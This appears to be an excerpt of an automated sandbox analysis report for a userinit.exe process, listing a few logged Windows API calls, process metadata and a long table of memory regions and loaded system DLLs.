[0170.647] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xae7c8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.647] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xae8c4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xae8d8, lpMaximumComponentLength=0xae8d4, lpFileSystemFlags=0xae8d0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xae8d8*=0x90c08a66, lpMaximumComponentLength=0xae8d4*=0xff, lpFileSystemFlags=0xae8d0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.647] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xae7c8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.647] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0xae8c4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0xae8d8, lpMaximumComponentLength=0xae8d4, lpFileSystemFlags=0xae8d0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xae8d8*=0x90c08a66, lpMaximumComponentLength=0xae8d4*=0xff, lpFileSystemFlags=0xae8d0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0170.647] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xae7c8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.648] GetSystemDefaultLangID () returned 0x200409
[0170.648] VerLanguageNameA (in: wLang=0x409, szLang=0xae87c, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0170.648] ExitProcess (uExitCode=0x0)
Thread:
id = 284
os_tid = 0x294
Thread:
id = 285
os_tid = 0x334
Process:
id = "46"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be8a0"
os_pid = "0x5cc"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0xf18"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 5423
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 5424
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 5425
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 5426
start_va = 0x1d0000
end_va = 0x20ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 5427
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 5428
start_va = 0x6f0000
end_va = 0x6f8fff
entry_point = 0x6f0000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 5429
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 5430
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 5431
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 5432
start_va = 0x7ffd6000
end_va = 0x7ffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd6000"
filename = ""
Region:
id = 5433
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 5434
start_va = 0x8f0000
end_va = 0x9effff
entry_point = 0x0
region_type = private
name = "private_0x00000000008f0000"
filename = ""
Region:
id = 5435
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 5436
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 5437
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 5438
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 5439
start_va = 0x130000
end_va = 0x13ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 5440
start_va = 0x6d7b0000
end_va = 0x6d833fff
entry_point = 0x6d7b0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 5441
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 5442
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 5443
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 5444
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 5445
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 5446
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 5447
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 5448
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 5449
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 5450
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 5451
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 5452
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 5453
start_va = 0x210000
end_va = 0x2d7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000210000"
filename = ""
Region:
id = 5454
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 5455
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5456
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 5457
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 5458
start_va = 0x2e0000
end_va = 0x3e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002e0000"
filename = ""
Region:
id = 5459
start_va = 0x530000
end_va = 0x53ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 5460
start_va = 0x9f0000
end_va = 0x15effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009f0000"
filename = ""
Region:
id = 5461
start_va = 0x540000
end_va = 0x63ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 5462
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 5463
start_va = 0x470000
end_va = 0x51ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 5464
start_va = 0x700000
end_va = 0x7defff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000700000"
filename = ""
Region:
id = 5465
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 5466
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 5467
start_va = 0x7e0000
end_va = 0x8effff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5468
start_va = 0x15f0000
end_va = 0x1f1ffff
entry_point = 0x15f0000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 5469
start_va = 0xe0000
end_va = 0xe6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 5470
start_va = 0xf0000
end_va = 0xf1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 5471
start_va = 0x1f20000
end_va = 0x2312fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f20000"
filename = ""
Region:
id = 5472
start_va = 0x140000
end_va = 0x1bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 5473
start_va = 0x2320000
end_va = 0x242cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002320000"
filename = ""
Region:
id = 5474
start_va = 0x2430000
end_va = 0x252ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002430000"
filename = ""
Region:
id = 5475
start_va = 0x2530000
end_va = 0x272ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002530000"
filename = ""
Region:
id = 5476
start_va = 0x640000
end_va = 0x6c0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 5477
start_va = 0x7e0000
end_va = 0x862fff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5478
start_va = 0x8b0000
end_va = 0x8effff
entry_point = 0x0
region_type = private
name = "private_0x00000000008b0000"
filename = ""
Region:
id = 5479
start_va = 0x640000
end_va = 0x6c4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 5480
start_va = 0x7e0000
end_va = 0x866fff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5481
start_va = 0x640000
end_va = 0x6c8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 5482
start_va = 0x7e0000
end_va = 0x86afff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5483
start_va = 0x640000
end_va = 0x6ccfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 5484
start_va = 0x7e0000
end_va = 0x86efff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5485
start_va = 0x640000
end_va = 0x6d0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 5486
start_va = 0x7e0000
end_va = 0x872fff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5487
start_va = 0x640000
end_va = 0x6d4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 5488
start_va = 0x7e0000
end_va = 0x876fff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5489
start_va = 0x640000
end_va = 0x6d8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 5490
start_va = 0x7e0000
end_va = 0x87afff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5491
start_va = 0x640000
end_va = 0x6dcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 5492
start_va = 0x7e0000
end_va = 0x87efff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5493
start_va = 0x640000
end_va = 0x6e0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 5494
start_va = 0x7e0000
end_va = 0x882fff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5495
start_va = 0x640000
end_va = 0x6e4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 5496
start_va = 0x7e0000
end_va = 0x886fff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5497
start_va = 0x640000
end_va = 0x6e8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 5498
start_va = 0x7e0000
end_va = 0x88afff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5499
start_va = 0x640000
end_va = 0x6ecfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 5500
start_va = 0x7e0000
end_va = 0x88efff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5501
start_va = 0x2730000
end_va = 0x27e0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5502
start_va = 0x7e0000
end_va = 0x892fff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5503
start_va = 0x2730000
end_va = 0x27e4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5504
start_va = 0x7e0000
end_va = 0x896fff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5505
start_va = 0x2730000
end_va = 0x27e8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5506
start_va = 0x7e0000
end_va = 0x89afff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5507
start_va = 0x2730000
end_va = 0x27ecfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5509
start_va = 0x7e0000
end_va = 0x89efff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5510
start_va = 0x2730000
end_va = 0x27f0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5511
start_va = 0x7e0000
end_va = 0x8a2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5545
start_va = 0x2730000
end_va = 0x27f4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5546
start_va = 0x7e0000
end_va = 0x8a6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5547
start_va = 0x2730000
end_va = 0x27f8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5548
start_va = 0x7e0000
end_va = 0x8aafff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5549
start_va = 0x2730000
end_va = 0x27fcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5550
start_va = 0x7e0000
end_va = 0x8aefff
entry_point = 0x0
region_type = private
name = "private_0x00000000007e0000"
filename = ""
Region:
id = 5551
start_va = 0x2730000
end_va = 0x2800fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5560
start_va = 0x2810000
end_va = 0x28e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 5561
start_va = 0x2730000
end_va = 0x2804fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5562
start_va = 0x2810000
end_va = 0x28e6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 5575
start_va = 0x2730000
end_va = 0x2808fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5576
start_va = 0x2810000
end_va = 0x28eafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 5577
start_va = 0x2730000
end_va = 0x280cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5579
start_va = 0x2810000
end_va = 0x28eefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 5580
start_va = 0x28f0000
end_va = 0x29d0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028f0000"
filename = ""
Region:
id = 5581
start_va = 0x2730000
end_va = 0x2812fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5584
start_va = 0x2820000
end_va = 0x2904fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 5585
start_va = 0x2730000
end_va = 0x2816fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5586
start_va = 0x2820000
end_va = 0x2908fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 5591
start_va = 0x2730000
end_va = 0x281afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5592
start_va = 0x2820000
end_va = 0x290cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 5593
start_va = 0x2730000
end_va = 0x281efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5598
start_va = 0x2820000
end_va = 0x2910fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 5603
start_va = 0x2920000
end_va = 0x2a12fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002920000"
filename = ""
Region:
id = 5604
start_va = 0x2730000
end_va = 0x2824fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5609
start_va = 0x2830000
end_va = 0x2926fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5610
start_va = 0x2730000
end_va = 0x2828fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5611
start_va = 0x2830000
end_va = 0x292afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5616
start_va = 0x2730000
end_va = 0x282cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5617
start_va = 0x2830000
end_va = 0x292efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 5618
start_va = 0x2930000
end_va = 0x2a30fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002930000"
filename = ""
Region:
id = 5623
start_va = 0x2730000
end_va = 0x2832fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5624
start_va = 0x2840000
end_va = 0x2944fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 5629
start_va = 0x2730000
end_va = 0x2836fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5630
start_va = 0x2840000
end_va = 0x2948fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 5631
start_va = 0x2730000
end_va = 0x283afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5635
start_va = 0x2840000
end_va = 0x294cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 5636
start_va = 0x2730000
end_va = 0x283ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 5640
start_va = 0x2950000
end_va = 0x2a62fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002950000"
filename = ""
Region:
id = 5641
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 5642
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 5643
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 5644
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 5645
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 5646
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 5647
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 5648
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x100000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 5649
start_va = 0x2a70000
end_va = 0x2b6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a70000"
filename = ""
Region:
id = 5650
start_va = 0x110000
end_va = 0x110fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 5651
start_va = 0x6d790000
end_va = 0x6d7a8fff
entry_point = 0x6d790000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 5652
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 5653
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 5654
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 5655
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 5662
start_va = 0x2b70000
end_va = 0x2baffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b70000"
filename = ""
Region:
id = 5663
start_va = 0x2cf0000
end_va = 0x2deffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002cf0000"
filename = ""
Region:
id = 5664
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 5665
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 5666
start_va = 0x2df0000
end_va = 0x30befff
entry_point = 0x2df0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 5670
start_va = 0x120000
end_va = 0x121fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000120000"
filename = ""
Region:
id = 5671
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 5672
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x1c0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 5673
start_va = 0x3f0000
end_va = 0x3f1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003f0000"
filename = ""
Region:
id = 5674
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 5675
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 5676
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001c0000"
filename = ""
Region:
id = 5677
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 5678
start_va = 0x470000
end_va = 0x49bfff
entry_point = 0x470000
region_type = mapped_file
name = "index.dat"
